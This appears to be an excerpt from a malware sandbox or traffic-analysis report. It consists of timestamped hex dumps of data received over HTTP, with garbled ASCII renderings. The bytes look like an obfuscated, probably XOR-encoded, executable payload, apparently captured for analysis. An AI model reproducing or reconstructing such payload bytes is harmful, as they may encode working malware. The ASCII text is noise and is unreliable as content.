                                2022-06-26 07:42:48 UTC16INData Raw: 25 25 25 75 0d a9 a6 da da 5e 9e 29 73 50 0d 83 36 9e 68 65 25 60 f7 ea a9 e1 da da da 66 6f 21 ac c4 ea a9 8c da da da 2c 77 75 0d 30 a6 da da 60 e5 ea a9 4c da da da 9e 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a5 da da da c6 38 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da e2 25 25 0d 41 1f da da 66 fd 60 b6 a3 ea 68 79 49 29 66 a2 66 a6 0d 14 25 25 25 c6 4f 66 b8 66 a2 66 ae 0d ad dc 25 25 7b 66 e2 66 71 49 29 66 ae 0d 13 d4 da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d 44 dc 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 66 e5 60 a4 ea a9 31 da da da 75 2c 77 0d cd ef da da 60 e5 ea a9 f1 23 da da 7f da 57 64 27 0d cb ef da da 9e b5 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29
                                Data Ascii: %%%u^)sP6he%`fo!,wu0`L.{20\)u^!fd9If`Zf8h\%%XM{hiI-fqI)%%Af`hyI)ff%%%Offf%%{ffqI)ff`X'ffD%%\)5%%8:6f`1u,w`#Wd'`w/Eo'o)
                                2022-06-26 07:42:48 UTC17INData Raw: da da da 2a 5a 0d 38 c6 57 30 64 b0 64 fd de 81 53 27 64 17 0d fa da da da 2a 5a 15 38 c6 41 66 de 5e 9e 29 0d 42 33 25 25 2a 5a ce c6 e8 66 de 5e 9e 29 0d 45 e2 25 25 2a 5a ce 3a 83 36 9e b5 5e 18 3d e5 1c 25 25 99 e2 da f0 3d e5 1c 25 9e d5 35 0d 60 03 da da 9e 2e 7b 32 30 64 9e 64 fb 0c e5 af 1c dc 68 a1 2d 2f 66 4a 21 0c e5 66 2a 1d 2c 66 2a 29 04 9c a3 e6 64 e7 dc 15 dc ff 0d 1d 03 da da 66 22 29 66 f2 66 37 af 2f a5 d4 2f 99 0c a5 d4 e6 99 18 a5 d4 31 99 24 a5 d4 e8 99 30 a5 d4 33 99 95 a5 d4 ea ea a9 a5 25 25 25 a5 d4 ec ea a9 ad 25 25 25 d5 27 38 3a 83 36 c4 f4 03 da da 66 39 55 dc fd 0d 5e ce da da dd 29 25 25 25 c6 58 66 39 55 dc fd 0d 03 d4 da da dd 29 25 25 25 c6 91 68 39 55 dc fd 0d 2c da da da dd 35 25 25 25 c6 36 0c a4 af 6f dc da 99 ec 27
                                Data Ascii: *Z8W0ddS'd*Z8Af^)B3%%*Zf^)E%%*Z:6^=%%=%5`.{20ddh-/fJ!f*,f*)df")ff7//1$03%%%%%%'8:6f9U^)%%%Xf9U)%%%h9U,5%%%6o'
                                2022-06-26 07:42:48 UTC18INData Raw: 66 3d 60 b6 5a f6 60 b6 58 e2 d5 29 0d 97 b4 da da 66 20 21 66 30 1d 0d 9a da da da c4 3e dc 25 25 0e da 5e 58 0d 25 99 e8 5e 48 0d 29 66 20 0d 66 5d 5e 48 0d 29 66 20 1d ea db 65 dc dc 20 1d 66 20 1d 66 95 27 66 75 2b 60 f7 99 e2 66 27 64 20 1d c6 e0 0e e5 64 20 1d 66 9e d2 13 64 20 11 66 20 11 74 d2 d6 16 15 99 e2 d5 29 0d 37 b4 da da 5e 20 11 2d 5e 58 0d 25 99 2d 66 20 0d 5e 5d dc 50 61 66 20 0d 64 20 09 16 d6 a3 fa 5e 58 1d 25 99 f4 66 20 0d 5e e5 2d 66 ae ea 8a fb de e7 66 aa 06 a6 66 30 1d 0d 02 da da da 68 20 09 66 30 11 0d ed b2 da da 66 20 09 64 20 0d c6 3e 66 20 0d da 2d 66 20 11 0d 3e b2 da da 64 20 0d 64 58 15 16 38 15 58 de 64 38 15 5e 58 1d 25 99 51 66 30 15 ea 8a fb 66 20 0d 5e e5 2d 0e a4 0d 65 01 da da 66 20 15 75 66 30 21 66 37 66 20 0d
                                Data Ascii: f=`Z`X)f !f0>%%^X%^H)f f]^H)f e f f'fu+`f'd d fd f t)7^ -^X%-f ^]Paf d ^X%f ^-fff0h f0f d >f -f >d dX8Xd8^X%Qf0f ^-ef uf0!f7f
                                2022-06-26 07:42:48 UTC20INData Raw: 0d e0 25 25 25 68 60 ba 23 da da df e0 dc 25 25 0d 5c d8 da da 68 20 0d 75 68 20 13 75 8f 25 8f 25 68 60 ba 23 da da 75 66 20 1d 75 0d 04 96 da da 60 e5 99 47 68 20 0d 75 68 20 13 75 8f 25 8f 25 8d f1 7d 65 25 66 20 1d 75 0d e6 96 da da 60 e5 99 29 eb 20 13 25 eb 20 17 25 0e e5 7f 34 34 89 64 35 8d 32 32 65 25 66 20 1d 75 0d b4 df da da 9e c4 0a 07 da da c6 ca 8d e0 dc 25 25 66 20 21 75 68 60 ba 23 da da 75 0d c9 df da da 8f e0 68 20 ce 75 8f de 0d 5a df da da 75 0d 2c df da da 0e b6 a5 98 ba 23 da da 25 ea a9 d4 25 25 25 a5 58 ce 25 50 2f a5 58 13 25 ea a9 c4 25 25 25 68 60 ba 23 da da 75 0d 93 df da da 68 70 ba 23 da da de e7 64 20 09 c6 de da 28 09 66 20 09 a5 5d 53 99 e6 68 60 ba 23 da da 16 20 09 50 0f 68 60 ba 23 da da 16 20 09 ea a9 86 25 25 25 da
                                Data Ascii: %%%h`#%%\h uh u%%h`#uf u`Gh uh u%%}e%f u`) % %44d522e%f u%%f !uh`#uh uZu,#%%%%X%P/X%%%%h`#uhp#d (f ]Sh`# Ph`# %%%
                                2022-06-26 07:42:48 UTC21INData Raw: 5e e9 15 2e 7b 64 28 19 64 30 1d 64 20 21 5e 58 19 25 50 2f 0e e5 64 20 15 c4 e4 dc 25 25 a2 20 15 da da da da 0e e5 0e 1b 5e 58 21 25 ea a9 84 25 25 25 c4 a7 25 25 25 66 30 19 0e a4 af 31 57 6b 1b 9c a5 99 91 16 50 2d ea 5e fd 25 25 25 5e bc 1a 1b 9c 45 99 53 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 96 25 25 25 16 50 2d ea 5e d7 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b e6 ac 66 ef 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 68 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b 8b e6 ac 66 28 21 8b 64 39 1c c6 e2 66 30 21 8b 64 31 67 65 16 50 2d 4e e4 16 20 1d ea a7 95 da da da 16 20 1d 97 29 66 20 1d 6d 66 30 21 8b a2 29 67 25 25 c6 22 16 50 2d 4e 67 66 30 19 af 39 57 6b 1b e7 a5 99 55 16 50 2d 4e 10 a5 07 1a 1b e7 45 99 39 66 30 19 af 39
                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:42:48 UTC22INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:42:48 UTC24INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:42:48 UTC25INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC26INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:42:48 UTC28INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC29INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:42:48 UTC30INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
                                2022-06-26 07:42:48 UTC32INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:42:48 UTC33INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:42:48 UTC34INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:42:48 UTC36INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:42:48 UTC37INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:42:48 UTC38INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
                                2022-06-26 07:42:48 UTC40INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:42:48 UTC41INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
